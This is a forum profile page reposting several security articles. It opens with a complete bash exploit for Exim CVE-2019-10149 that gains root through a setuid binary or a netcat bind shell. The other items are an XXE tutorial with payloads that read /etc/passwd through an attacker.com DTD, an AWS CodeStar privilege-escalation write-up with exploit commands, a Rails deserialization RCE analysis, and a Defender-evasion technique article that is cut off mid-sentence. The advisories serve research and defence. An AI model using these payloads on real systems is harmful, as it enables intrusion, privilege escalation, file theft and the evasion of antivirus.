Jump to content

Nytro

Administrators
  • Posts

    18785
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. #!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> # # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). # Improper validation of recipient address in deliver_message() # function in /src/deliver.c may lead to remote command execution. # (CVE-2019-10149) # # This is a local privilege escalation exploit for "The Return # of the WIZard" vulnerability reported by the Qualys Security # Advisory team. # # Credits: # Qualys Security Advisory team (kudos for your amazing research!) # Dennis 'dhn' Herrmann (/dev/tcp technique) # # Usage (setuid method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m setuid # Preparing setuid shell helper... # Delivering setuid payload... # [...] # Waiting 5 seconds... # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned # # id # uid=0(root) gid=0(root) groups=0(root) # # Usage (netcat method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m netcat # Delivering netcat payload... # Waiting 5 seconds... # localhost [127.0.0.1] 31337 (?) open # id # uid=0(root) gid=0(root) groups=0(root) # # Vulnerable platforms: # Exim 4.87 - 4.91 # # Tested against: # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] # METHOD="setuid" # default method PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' # usage instructions function usage() { echo "$0 [-m METHOD]" echo echo "-m setuid : use the setuid payload (default)" echo "-m netcat : use the netcat payload" echo exit 1 } # payload delivery function exploit() { # connect to localhost:25 exec 3<>/dev/tcp/localhost/25 # deliver the payload read -u 3 && echo $REPLY echo "helo localhost" >&3 read -u 3 && echo $REPLY echo "mail from:<>" >&3 read -u 3 && echo $REPLY echo "rcpt to:<$PAYLOAD>" >&3 read -u 3 && echo $REPLY echo "data" >&3 read -u 3 && echo $REPLY for i in {1..31} do echo "Received: $i" >&3 done echo "." >&3 read -u 3 && echo $REPLY echo "quit" >&3 read -u 3 && echo $REPLY } # print banner echo echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' echo # parse command line while [ ! -z "$1" ]; do case $1 in -m) shift; METHOD="$1"; shift;; * ) usage ;; esac done if [ -z $METHOD ]; then usage fi # setuid method if [ $METHOD = "setuid" ]; then # prepare a setuid shell helper to circumvent bash checks echo "Preparing setuid shell helper..." echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null if [ $? -ne 0 ]; then echo "Problems compiling setuid shell helper, check your gcc." echo "Falling back to the /bin/sh method." cp /bin/sh /tmp/pwned fi echo # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_SETUID exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 ls -l /tmp/pwned /tmp/pwned # netcat method elif [ $METHOD = "netcat" ]; then # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_NETCAT exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 nc -v 127.0.0.1 31337 # print help else usage fi Sursa: https://www.exploit-db.com/exploits/46996
  2. Arseniy Sharoglazov Exploiting XXE with local DTD files This little technique can force your blind XXE to output anything you want! Why do we have trouble exploiting XXE in 2k18? Imagine you have an XXE. External entities are supported, but the server’s response is always empty. In this case you have two options: error-based and out-of-band exploitation. Consider this error-based example: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> %ext; ]> <message></message> java.io.FileNotFoundException: /nonexistent/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin (No such file or directory) Contents of ext.dtd <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; See? You are using an external server for payload delivery. What can you do if there is a firewall between you and the target server? Nothing! What if we just put external DTD content directly in the DOCTYPE? Some errors will always appear: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ]> <message></message> Internal Error: SAX Parser Error. Detail: The parameter entity reference “%file;” cannot occur within markup in the internal subset of the DTD. External DTD allows us to include one entity inside the second, but it is prohibited in the internal DTD. What can we do with internal DTD? To use external DTD syntax in the internal DTD subset, you can bruteforce a local dtd file on the target host and redefine some parameter-entity references inside it: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd; ]> <message>any text</message> java.io.FileNotFoundException: /nonexistent/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin (No such file or directory) Contents of sip-app_1_0.dtd … <!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of"> <!ELEMENT pattern (%condition;)> … It works because all XML entities are constant. If you define two entities with the same name, only the first one will be used. How can we find a local dtd file? Nothing is easier than enumerating files and directories. Below are a few more examples of successful applications of this trick: Custom Linux System <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamsa 'Your DTD code'> %local_dtd; Custom Windows System <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'> %local_dtd; Thanks to @Mike_n1 from Positive Technologies for sharing this path of always-existing Windows DTD file. Cisco WebEx <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'> %local_dtd; Citrix XenMobile Server <!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"> <!ENTITY % Body '>Your DTD code<!ENTITY test "test"'> %local_dtd; Custom Multi-Platform IBM WebSphere Application <!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd"> <!ENTITY % xs-datatypes 'Your DTD code'> <!ENTITY % simpleType "a"> <!ENTITY % restriction "b"> <!ENTITY % boolean "(c)"> <!ENTITY % URIref "CDATA"> <!ENTITY % XPathExpr "CDATA"> <!ENTITY % QName "NMTOKEN"> <!ENTITY % NCName "NMTOKEN"> <!ENTITY % nonNegativeInteger "NMTOKEN"> %local_dtd; Timeline 01/01/2016 — Discovering the technique 12/12/2018 — Writing the article :D 13/12/2018 — Full disclosure 2018 DTD OOB WAF XML XXE Sursa: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
  3. Escalating AWS IAM Privileges with an Undocumented CodeStar API June 18, 2019 Spencer Gietzen Introduction to AWS IAM Privilege Escalation There are an extensive amount of individual APIs available on AWS, which also means there are many ways to misconfigure permissions to those APIs. These misconfigurations can give attackers the ability to abuse APIs to gain more privileges than what was originally intended by your AWS administrator. We at Rhino Security Labs have demonstrated this in the past with our blog post on 17 different privilege escalation methods in AWS. Most of these privilege escalation methods rely on the IAM service for abuse. An example of this is the “iam:PutUserPolicy” permission that allows a user to create an administrator-level inline policy on themselves, making themselves an administrator. This blog will outline a new method of abuse for privilege escalation within AWS through CodeStar, an undocumented AWS API, as well as two new privilege escalation checks and auto-exploits added to Pacu’s “iam__privesc_scan” module. AWS CodeStar AWS CodeStar is a service that allows you to “quickly develop, build, and deploy applications on AWS”. It integrates a variety of other different AWS services and 3rd party applications (such as Atlassian Jira) to “track progress across your entire software development process”. It is essentially a quick, easy way to get your projects up and running with your team in AWS. CodeStar Undocumented APIs Like many AWS services, CodeStar has some public-facing APIs that are not publicly documented. In most cases, these exist for convenience when browsing AWS through the web console. For example, CodeStar supports the following APIs, but they are not documented in the official AWS documentation: codestar:GetTileData codestar:PutTileData codestar:VerifyServiceRole There are more undocumented APIs than on this list–the other non-listed APIs are typically used by your web browser to display and verify information in the AWS web console. I discovered these undocumented APIs by simply setting up Burp Suite to intercept my HTTP traffic while browsing the AWS web console and seeing what showed up. Here is an example of some requests Burp Suite picked up while browsing CodeStar in the AWS web console: codestar:CreateProjectFromTemplate One of the undocumented APIs that we discovered was the codestar:CreateProjectFromTemplate API. This API was created for the web console to allow you to create sample (templated) projects to try out CodeStar. If you look at the documented APIs for CodeStar, you’ll only see codestar:CreateProject, but this page references project templates as well. As long as the CodeStar service role exists in the target account, this single undocumented API allows us to escalate our privileges in AWS. Because this is an undocumented API and people typically don’t know it exists, it’s likely not granted to any users in AWS directly. This means that although you only need this single permission to escalate privileges, it will likely be granted with a broader set of permissions, such as “codestar:Create*” or “codestar:*” in your IAM permissions. Because those are using the wildcard character “*”, it expands out and includes codestar:CreateProjectFromTemplate. If you needed another reason to stop using wildcards in your IAM policies, this is it. The following AWS-managed IAM policies grant access to codestar:CreateProjectFromTemplate, but there are likely many more customer-managed IAM policies out there that grant it as well. arn:aws:iam::aws:policy/AdministratorAccess (obviously) arn:aws:iam::aws:policy/PowerUserAccess arn:aws:iam::aws:policy/AWSCodeStarFullAccess arn:aws:iam::aws:policy/service-role/AWSCodeStarServiceRole Undocumented CodeStar API to Privilege Escalation The codestar:CreateProjectFromTemplate permission was the only permission needed to create a project from the variety of templates offered in the AWS web console. The trick here is that these templates are “managed” by AWS, so when you choose one to launch, it will use the CodeStar service role to launch the project and not your own permissions. That means that you are essentially instructing the CodeStar service role to act on your behalf, and because that service role likely has more permissions than you do, you can utilize them for malicious activity. As part of these templates, an IAM policy is created in your account named “CodeStarWorker-<project name>-Owner”, where <project name> is the name you give the CodeStar project. The CodeStar service role then attaches that policy to your user because you are the owner of that project. Just by doing that, we have already escalated our permissions, because the “CodeStarWorker-<project name>-Owner” policy grants a lot of access. Most permissions are restricted to the resources that the project created, but some are more general (like a few IAM permissions on your own user). There are also other policies and roles that get created as part of this process–some important and some not–so we’ll touch on those as we go. The above screenshot shows some of the available templates when creating a CodeStar project through the web console. Prior to AWS’s Fix When this vulnerability was originally discovered, the permissions that the “CodeStarWorker-<project name>-Owner” policy granted were slightly different than they are now. Originally, as long as the CodeStar service role existed in the account, an IAM user with only the codestar:CreateProjectFromTemplate permission could escalate their permissions to a full administrator of the AWS account. This was because one of the resources that was created was an IAM role named “CodeStarWorker-<project name>-CloudFormation” and it was used to create a CloudFormation stack to build the project that you chose. It was originally granted full access to 50+ AWS services, including a variety of IAM permissions. A few of the important IAM permissions included: iam:AttachRolePolicy iam:AttachUserPolicy iam:PutRolePolicy If you have read our blog on AWS privilege escalation, then you already know these permissions can be used to quickly escalate a user or role to a full administrator. For a copy of the old policy that was attached to the “CodeStarWorker-<project name>-CloudFormation” IAM role, visit this link. With that unrestricted access to so many services, you could almost certainly compromise most of your target’s resources in AWS, spin up cryptominers, or just delete everything. To use these permissions, we needed to gain access to the “CodeStarWorker-<project name>-CloudFormation” IAM role. This wasn’t difficult because it was already passed to a CloudFormation stack that the “CodeStarWorker-<project name>-Owner” IAM policy granted us access to. This meant we just needed to update the CloudFormation stack and pass in a template that would use the role’s permissions to do something on our behalf. Due to CloudFormation’s limitations, this “something” needed to be an inline policy to make that same CloudFormation role an administrator, then a second UpdateStack call would need to be made to also make your original user an administrator. There were many reasons for this, but essentially it was because you couldn’t instruct CloudFormation to attach an existing managed IAM policy to an existing user. Disclosure and How AWS Fixed the Privilege Escalation We disclosed this vulnerability to AWS Security on March 19th, 2019, and worked with them to resolve the risk of this attack. Over the next few months, multiple fixes were implemented because a few bypasses were discovered the first few times. Those bypasses still allowed for full administrator privilege escalation, even after their initial fixes, but by working with them, we were able to get that resolved. By mid-May 2019, we had the go-ahead that the vulnerability had been remediated. Overall, this vulnerability was fixed by limiting the permissions granted to the “CodeStarWorker-<project name>-Owner” IAM policy and the “CodeStartWorker-<project name>-CloudFormation” IAM role. The role was restricted by requiring the use of an IAM permissions boundary in its IAM permissions, which is effective in preventing privilege escalation to a full administrator. Depending on what other resources/misconfigurations exist in the environment, it might still be possible to escalate to full admin access (through a service such as Lambda or EC2) after exploiting this method. They also introduced another fix, where the AWS web console now uses “codestar:CreateProject” and “iam:PassRole” to create projects from templates, but the “codestar:CreateProjectFromTemplate” API is still publicly accessible and enabled, so it can still be abused for privilege escalation (just to a lesser extent than before). The Attack Vector After the Fix While the AWS CodeStar team was responsive & implemented several fixes, we were still able to identify a way to use the undocumented API for privilege escalation. This wasn’t as severe as before AWS implemented their fixes, but still noteworthy. The new attack path looks like this: Use codestar:CreateProjectFromTemplate to create a new project. You will be granted access to “cloudformation:UpdateStack” on a stack that has the “CodeStarWorker-<project name>-CloudFormation” IAM role passed to it. Use the CloudFormation permissions to update the target stack with a CloudFormation template of your choice. The name of the stack that needs to be updated will be “awscodestar-<project name>-infrastructure” or “awscodestar-<project name>-lambda”, depending on what template is used (in the example exploit script, at least). At this point, you would now have full access to the permissions granted to the CloudFormation IAM role. You won’t be able to get full administrator with this alone; you’ll need other misconfigured resources in the environment to help you do that. Automation and Exploitation with Pacu This privilege escalation method has been integrated into Pacu’s “iam__privesc_scan”, so you can check what users/roles are vulnerable within your account. To check your account for privilege escalation (all 17+ methods we have blogged about, including this one) from a fresh Pacu session, you can run the following commands from the Pacu CLI: 1. import_keys default: Import the “default” profile from the AWS credentials file (~/.aws/credentials) 2. run iam__enum_users_roles_policies_groups --users: Enumerate IAM users 3. run iam__enum_permissions --all-users: Enumerate their permissions 4. run iam__privesc_scan --offline: Check for privilege escalation methods As you can see, two IAM users were found and had their permissions enumerated. One of them was already an administrator, and the other user, “VulnerableUser”, is vulnerable to the “CodeStarCreateProjectFromTemplate” privilege escalation method. Two Bonus Privilege Escalations Added to Pacu With this blog release and Pacu update, we also added two more checks to the “iam__privesc_scan” module, both with auto-exploitation available. The first method is “PassExistingRoleToNewCodeStarProject” which uses “codestar:CreateProject” and “iam:PassRole” to escalate an IAM user or role to a full administrator. The second method is “CodeStarCreateProjectThenAssociateTeamMember” which uses “codestar:CreateProject” and “codestar:AssociateTeamMember” to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions. Pacu can be found on our GitHub with the latest updates pushed, so we suggest using it to check your own environment for any of these new privilege escalations. CreateProjectFromTemplate Exploit Script This privilege escalation method did not have auto-exploitation integrated into Pacu because it is an undocumented API, and thus unsupported in the “boto3” Python library. Instead, an exploit script was derived from AWS’s guide on manually signing API requests in Python. The standalone exploitation script can be found here. The script has the option of using two different templates, one of which grants more access than the other, but it requires that you know the ID of a VPC, the ID of a subnet in that VPC, and the name of an SSH key pair in the target region. It’s possible to collect some of that information by running the exploit script without that knowledge, then using the escalated permissions to enumerate that information, then re-running the exploit script again with the data you discovered. Using the Script The only permission required to run the script is “codestar:CreateProjectFromTemplate”, but you must be a user (not a role) because of how CodeStar works. Without prior information: you can run the script like this, which will use the default AWS profile: python3 CodeStarPrivEsc.py --profile default With the EC2/VPC information: you can run the script like this: python3 CodeStarPrivEsc.py --profile default --vpc-id vpc-4f1d6h18 --subnet-id subnet-2517b823 --key-pair-name MySSHKey There should be quite a bit of output, but at this point, you will just be waiting for the CloudFormation stacks to spin up in the environment and create all the necessary resources. Right away, you’ll gain some additional privileges through the “CodeStar_<project name>_Owner” IAM policy, but if you wait, additional versions of that policy will be created as other resources in the environment are created. The script will output the AWS CLI command you need to run to view your own user’s permissions, once the privilege escalation has complete. That command will look something like this (pay attention though, because the version ID will change, depending on the template you are using): aws iam get-policy-version --profile default --policy-arn arn:aws:iam::ACCOUNT-ID:policy/CodeStar_PROJECTNAME_Owner --version-id v3 It might take some time for that command to execute successfully while everything gets spun up in the environment, but once it is able to execute successfully, that means the privilege escalation process is complete. Utilizing Your New Permissions You’ll now have all the permissions that the policy you just viewed grants, and as part of that, you are granted the “cloudformation:UpdateStack” permission on a CloudFormation stack that has already had the “CodeStarWorker-<project name>-CloudFormation” IAM role passed to it. That means you can use that role for what you want, without ever needing the “iam:PassRole” permission. The permissions granted to this role should be the same every time (unless they update the template behind the scenes) and you won’t have permission to view them. Without prior information: visit this link to see what the access looks like. With the EC2/VPC information: visit this link to see what the access looks like. The script will also output the command to use to update the CloudFormation stack that you want to target. That command will look like this: aws cloudformation update-stack --profile default --region us-east-1 --stack-name awscodestar-PROJECTNAME-lambda --capabilities "CAPABILITY_NAMED_IAM" --template-body file://PATH-TO-CLOUDFORMATION-TEMPLATE Without prior information: the stack’s name will be “awscodestar-<project name>-lambda” With the EC2/VPC information: the stack’s name will be “awscodestar-<project name>-infrastructure”. Just create a CloudFormation template to create/modify the resources that you want and run that UpdateStack command to take control of the CloudFormation role. Video Example The following video shows a user who is only granted the “codestar:CreateProjectFromTemplate” permission escalating their permissions with the exploit script. The video only shows part 1 of 2 of the full attack-process because the next step depends on what your goal is. After the privilege escalation shown in this video is done, the next step would be to take control of the CloudFormation IAM role and abuse its permissions. The first step of the privilege escalation grants you access to a few things, including control over that CloudFormation role. Then, because the CloudFormation role has more access than you do, you can instruct it to perform an action on your behalf, whatever that may be. Note that around the 1 minute mark we cut out a few minutes of refreshing the browser. It takes time for the resources to deploy and the privilege escalation is not complete until all of them deploy, so there is a bit of waiting required. Defending Against Privilege Escalation through CodeStar There are a few key points to defending against this privilege escalation method in an AWS environment. If you don’t use CodeStar in your environment, ensure that the CodeStar IAM service role is removed from or never created in your account (the default name is “aws-codestar-service-role”). Implement the principle of least-privilege when granting access to your environment. This entails avoiding the use of wildcards in IAM policies where possible so that you can be 100% sure what APIs you are granting your users access to. Do not grant CodeStar permissions to your users unless they require it. Be careful granting CodeStar permissions through wildcards when they do require it, so that users aren’t granted the “codestar:CreateProjectFromTemplate” permission. If a user must be granted “codestar:CreateProject” and “iam:PassRole” (and/or “codestar:AssociateTeamMember”), be sure that sufficient monitoring is in place to detect any privilege escalation attempts. Conclusion The CodeStar undocumented API vulnerability has for the most part been fixed, but it is still a good idea to implement the defense strategies outlined above. This type of vulnerability might not only be limited to CodeStar, though, because there might be other undocumented APIs for other AWS services that are abusable like this one. Many undocumented APIs were discovered in just the short amount of time it took to find this vulnerability. Sometimes these undocumented APIs can be beneficial for attackers, while some might be useless. Either way, it is always useful as an attacker to dig deep and figure out what APIs exist and which ones are abusable. As a defender, it is necessary to keep up with the attackers to defend against unexpected and unknown attack vectors. Following best practice, like not using wildcards when giving permissions, is also a great way to avoid this vulnerability. We’ll be at re:Inforce next week, with two more big releases coming before the event. We’ll also be teaming up with Protego and handing out copies of our AWS pentesting book to the first 50 people each day of the event. Sursa: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/
  4. Remote Code Execution via Ruby on Rails Active Storage Insecure Deserialization June 20, 2019 | Guest Blogger In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team detail a recent code execution vulnerability in Ruby on Rails. The bug was originally discovered and reported by the researcher known as ooooooo_q. The following is a portion of their write-up covering CVE-2019-5420, with a few minimal modifications. An insecure deserialization vulnerability has been reported in the ActiveStorage component of Ruby on Rails. This vulnerability is due to deserializing a Ruby object within an HTTP URL using Marshal.load() without sufficient validation. The Vulnerability Rails is an open source web application Model View Controller (MVC) framework written in the Ruby language. Rails is built to encourage software engineering patterns and paradigms such as convention over configuration (CoC), don't repeat yourself (DRY), and the active record pattern. Rails ships as the following individual components: Rails 5.2 also ships with Active Storage, which is the component of interest for this vulnerability. Active Storage is used to store files and associate those files to Active Record. It is compatible with cloud storage services such as Amazon S3, Google Cloud Storage, and Microsoft Azure Storage. Ruby supports serialization of Objects to JSON, YAML or the Marshal serialization format. The Marshal serialization format is implemented by the Marshal class. Objects can be serialized and deserialized via the load() and dump() methods respectively. As shown above, the Marshal serialization format uses a type-length-value representation to serialize objects. Active Storage adds a few routes by default to the Rails application. Of interest to this report are the following two routes which are responsible for downloading and uploading files respectively: An insecure deserialization vulnerability exists in the ActiveStorage component of Ruby on Rails. This component uses ActiveSupport::MessageVerifier to ensure the integrity of the above :encoded_key and :encoded_token variables. In normal use, these variables are generated by MessageVerifier.generate(), and their structure is as follows: <base64-message> contains a base64 encoded version of the following JSON object: When a GET or PUT Request is sent to a URI that contains “/rails/active_storage/disk/”, the :encoded_key and :encoded_token variables are extracted. These variables are expected to be generated by MessageVerifier.generate(), hence decode_verified_key and decode_verified_token call MessageVerifier.verified() to check the integrity of and deserialize . Integrity is checked by calling ActiveSupport::SecurityUtils.secure_compare(digest, generate_digest(data))The digest is generated by signing data with a MessageVerifier secret. For Rails applications in development, this secret is always the application name, which is publicly known. For Rails applications in production, the secret is stored in a credentials.yml.enc file, which is encrypted using a key in the master.key. The contents of these files can be disclosed using CVE-2019-5418. Once the integrity check passes, is base64 decoded and Marshal.load() is called on the resulting byte stream without any further validation. An attacker can exploit this condition by embedding a dangerous object, such as ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy, to achieve remote code execution. CVE-2019-5418 needs to be chained to CVE-2019-5420 to ensure all conditions are met to achieve code execution. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request embedding malicious serialized objects to a vulnerable application. Successful exploitation would result in arbitrary code execution under the security context of the affected Ruby on Rails application. Source Code Walkthrough The following code snippet was taken from Rails version 5.2.1. Comments added by Trend Micro have been highlighted. From activesupport/lib/active_support/message_verifier.rb: From activestorage/app/controllers/active_storage/disk_controller.rb: The Exploit There is a publicly available Metasploit module demonstrating this vulnerability. The following stand-alone Python code may also be used. The usage is simply: python poc.py <host> [<port>] Please note our Python PoC assumes that the application name is "Demo::Application". The Patch This vulnerability received a patch from the vendor in March 2019. In addition to this bug, the patch also provides fixes for CVE-2019-5418, a file content disclosure bug, and CVE-2019-5419, a denial-of-service bug in Action View. If you are not able to immediately apply the patch, this issue can be mitigated by specifying a secret key in development mode. In config/environments/development.rb file, add the following: config.secret_key_base = SecureRandom.hex(64) The only other salient mitigation is to restrict access to the affected ports. Conclusion This bug exists in versions 6.0.0.X and 5.2.X of Rails. Given that this vulnerability received a CVSS v3 score of 9.8, users of Rails should definitely look to upgrade or apply the mitigations soon. Special thanks to Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Security Research services please visit http://go.trendmicro.com/tis/. The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the ZDI team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
  5. In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass By Eoin Carroll, Cedric Cochin, Steve Povolny and Steve Hearnden on Jun 20, 2019 Process Reimaging Overview The Windows Operating System has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts non-EDR (Endpoint Detection and Response) Endpoint Security Solution’s (such as Microsoft Defender Realtime Protection), ability to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee’s Advanced Threat Research to develop a new post-exploitation evasion technique we call “Process Reimaging”. This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre Attack Defense Evasion Category; however, it is , much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work on any endpoint security vendor or product implementing the APIs discussed below. The Windows Kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support User-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure. The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. We have developed a proof-of-concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE. The PoC allowed us to persist a malicious process (post exploitation) which does not get detected by Windows Defender. The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and blocks it on disk before process creation or performs a full scan on suspect machine post compromise to detect file on disk. In addition to Process Reimaging Weaponization and Protection recommendations, this blog includes a technical deep dive on reversing the Windows Kernel APIs for process attribute verification and Process Reimaging attack vectors. We use the SynAck Ransomware as a case study to illustrate Process Reimaging impact relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender ability to detect Process Hollowing or Doppelganging but the subverting of trust for process attribute verification. Antivirus Scanner Detection Points When an Antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time. The actual sequence for loading an image is as follows: FileCreate – the file is opened to be able to be mapped into memory. Section Create – the file is mapped into memory. Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO. ImageLoad – the file is loaded. CloseFile – the file is closed. If the Antivirus scanner is active at the point of load, it can use any one of the above steps (1,2 and 4) to protect the operating system against malicious code. If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading. There is currently no documented method to securely identify the underlying file associated with a running process on windows. This is due to Windows’ inability to retrieve the correct image filepath from the NTDLL APIs. This can be shown to evade Defender (MpMsEng.exe/MpEngine.dll) where the file being executed is a “Potentially Unwanted Program” such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects at phase 1 or 2 correctly. If Defender is not enabled, or if the launched program is not recognized by its current signature files, then the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, then Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, then the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process. Subverting Trust The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS Endpoints per figure 1 below. Figure 1 – Mitre Enterprise ATT&CK Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging with the objective of impersonating trusted processes. There are other Process manipulation techniques as documented by Mitre ATT&CK and Unprotect Project, but we will focus on Process Hollowing and Process Doppelganging. Process manipulation techniques exploit legitimate features of the Windows Operating System to impersonate trusted process executable binaries and generally require code injection. ESSs place inherent trust in the Windows Operating System for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs’ trust in the Windows Operating system could be subverted for digital signature validation. Similarly, Process Reimaging subverts an ESSs’ trust in the Windows Operating System for process attribute verification. When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS trusted infrastructure. McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, with associated campaigns. This insight helps organizations understand adversaries’ behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities. Process Manipulation Techniques (SynAck Ransomware) McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques, so that they can be compared to Process Reimaging based on a real-world observation. Process Manipulation defense evasion techniques continue to evolve. Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows Operating system they can be difficult to defend against if the Antivirus scanner does not block prior to process launch. Process Hollowing “Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis” (see figure 2 below) Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing Process Doppelganging “Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext” (see figure 3 below) Figure 3 – SynAck Ransomware Defense Evasion with Doppleganging Process Reimaging Weaponization The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths which enable an adversary to bypass windows operating system process attribute verification. This allows an adversary to persist a malicious process (post exploitation) by hiding the physical location of a process EXE (see figure 4 below). Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging Process Reimaging Technical Deep Dive NtQueryInformationProcess retrieves all process information from EPROCESS structure fields in the kernel and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field in EPROCESS structure. The EPROCESS structure contains filename and path information at the following fields/offsets (see figure 5 below): +0x3b8 SectionObject (filename and path) +0x448 ImageFilePointer* (filename and path) +0x450 ImageFileName (filename) +0x468 SeAuditProcessCreationInfo (filename and 